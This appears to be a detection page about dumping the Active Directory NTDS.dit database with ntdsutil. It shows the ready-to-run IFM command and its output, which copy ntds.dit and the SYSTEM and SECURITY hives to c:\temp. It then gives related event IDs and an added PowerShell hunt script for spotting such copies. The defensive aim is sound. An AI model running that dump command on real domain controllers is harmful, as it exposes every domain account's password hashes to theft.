Application NTDS.dit

Dump NTDS.dit with NTDSutil.exe:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

Output:

C:\Users\Administrator>powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
C:\Windows\system32\ntdsutil.exe: ac i ntds
Active instance set to "ntds".
C:\Windows\system32\ntdsutil.exe: ifm
ifm: create full c:\temp
Creating snapshot...
Snapshot set {8860a3a3-5d94-4952-9060-89c6b412c4df} generated successfully.
Snapshot {6908dc16-973d-406d-b970-94ec943ae166} mounted as C:\$SNAP_202306061921_VOLUMEC$\
Snapshot {6908dc16-973d-406d-b970-94ec943ae166} is already mounted.
Initiating DEFRAGMENTATION mode...
     Source Database: C:\$SNAP_202306061921_VOLUMEC$\Windows\NTDS\ntds.dit
     Target Database: c:\temp\Active Directory\ntds.dit

                  Defragmentation  Status (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

Copying registry files...
Copying c:\temp\registry\SYSTEM
Copying c:\temp\registry\SECURITY
Snapshot {6908dc16-973d-406d-b970-94ec943ae166} unmounted.
IFM media created successfully in c:\temp
ifm: q
C:\Windows\system32\ntdsutil.exe: q

| Event ID | Description |
| --- | --- |
| 216 | A database location change was detected. |
| 325 | The database engine created a new database. |
| 326 | The database engine attached a database. |
| 327 | The database engine detached a database. |
| 637 | |

Event Logs:

326 Event ID

637 Event ID

325 Event ID

327 Event ID

216 Event ID
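
A hunt for the events listed above, as an added example (not part of the original page): it queries the Application log for those event IDs, keeps the ones whose message mentions ntds.dit, groups them into bursts, and reports any database path outside the live \Windows\NTDS directory. The 7-day look-back, the 300-second grouping window and the expectation that the event message contains the database path are assumptions made for this example.

```powershell
# Added example: hunt for ntds.dit copy activity using the event IDs on this page.
$days          = 7      # look-back window (assumed value)
$windowSeconds = 300    # events closer together than this form one burst (assumed value)

$filter = @{
    LogName   = 'Application'
    Id        = 216, 325, 326, 327, 637    # event IDs from the table above
    StartTime = (Get-Date).AddDays(-$days)
}

# Keep only events whose rendered message mentions ntds.dit, oldest first.
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'ntds\.dit' } |
    Sort-Object TimeCreated

# Split the events into bursts: a gap longer than the window starts a new burst.
$bursts  = @()
$current = @()
foreach ($e in $events) {
    if ($current.Count -gt 0 -and
        ($e.TimeCreated - $current[-1].TimeCreated).TotalSeconds -gt $windowSeconds) {
        $bursts += ,$current
        $current = @()
    }
    $current += $e
}
if ($current.Count -gt 0) { $bursts += ,$current }

foreach ($b in $bursts) {
    # Extract every ntds.dit path mentioned in the burst's messages.
    $paths = $b | ForEach-Object {
        [regex]::Matches($_.Message, '(?i)[a-z]:\\[^",()\r\n]*?ntds\.dit') |
            ForEach-Object { $_.Value }
    } | Sort-Object -Unique

    [pscustomobject]@{
        Start     = $b[0].TimeCreated
        End       = $b[-1].TimeCreated
        EventIds  = ($b.Id | Sort-Object -Unique) -join ','
        Providers = ($b.ProviderName | Sort-Object -Unique) -join ','
        # A snapshot mount or a staging folder such as c:\temp shows up here;
        # the live database path is filtered out.
        OffPath   = ($paths | Where-Object {
                        $_ -notmatch '(?i)^[a-z]:\\Windows\\NTDS\\ntds\.dit$' }) -join '; '
    }
}
```

A burst with a non-empty OffPath on a domain controller is the pattern the ntdsutil output above produces: a snapshot source path and a target database outside the NTDS directory.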
